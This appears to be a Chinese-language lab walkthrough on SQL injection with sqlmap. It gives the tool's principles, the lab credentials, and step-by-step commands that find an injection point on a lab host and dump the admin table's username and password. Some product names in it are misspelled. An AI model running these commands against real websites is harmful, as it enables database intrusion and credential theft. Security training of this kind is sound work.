Sqlmap資料庫注入攻擊
實驗目的
利用sqlmap命令破解出access資料中的admin的密碼bfpns
實驗原理
SQLMap是一個先進的自動化SQL注入工具,其主要功能是掃描、發現並利用給定的URL的SQL注入漏洞。目前支援的資料庫管理系統包括Ms-soL、MySQL、Oracde和PostgreSQL.也能夠識別諸如DB2、Informix. Sybase、Interbase和MS Access之類的資料庫系統。SQLMap採用四種獨特的SQL注入技術,分別是盲推理SQL注入、union查詢SQL注入、堆查詢和基於時間的SQL盲注入。其廣泛的功能和選項包括資料庫指紋、列舉、資料提取、訪問目標檔案系統,並在獲取完全操作許可權時執行任意命令。此外,該工具還可以從Burp Proxy直Web Scarab日誌及標準的文字檔案中解析目標列表。更突出的是,它提供採用分類Coogle dorks掃描Oragle拽索引擎,獲取指定目標的功能。
實驗內容
sqlmap命令破解出access資料中的admin的密碼bfpns
實驗環境描述
攻擊機Kali作業系統
使用者名稱密碼為:root toor
靶機
使用者名稱密碼為:admin 123456
實驗步驟
一、Sqlmap破解access資料庫 1.1單擊桌面空白處,右鍵選單選擇“在終端中開啟”。如圖1所示(有詢問資訊返回的,看返回的資訊,輸入Y或者N,看返回的情況而定);
1.2在終端中輸入命令“sqlmap –u http://192.168.10.147:99/onews.asp?id=45
”,-u掃描注入點掃描目標主機,檢測出的資訊準確。如圖2所示
1.3在終端中輸入命令“sqlmap –u http://192.168.10.147:99/onews.asp?id=45 --users
”獲取到使用者名稱。如圖3所示
1.4在終端中輸入命令“sqlmap –u http://192.168.10.147:99/onews.asp?id=45 -–dump –tables
”探測資料庫和表資訊。如圖4所示
1.5顯示探測出來的欄位資訊。如圖5所示
1.6針對admin表探測出的結構。如圖6所示
1.7在終端中輸入命令” sqlmap -u "http://192.168.10.147:99/onews.asp?id=45" --dump -T admin -C admin,password
1.8已經猜解出來使用者名稱為admin。如圖8所示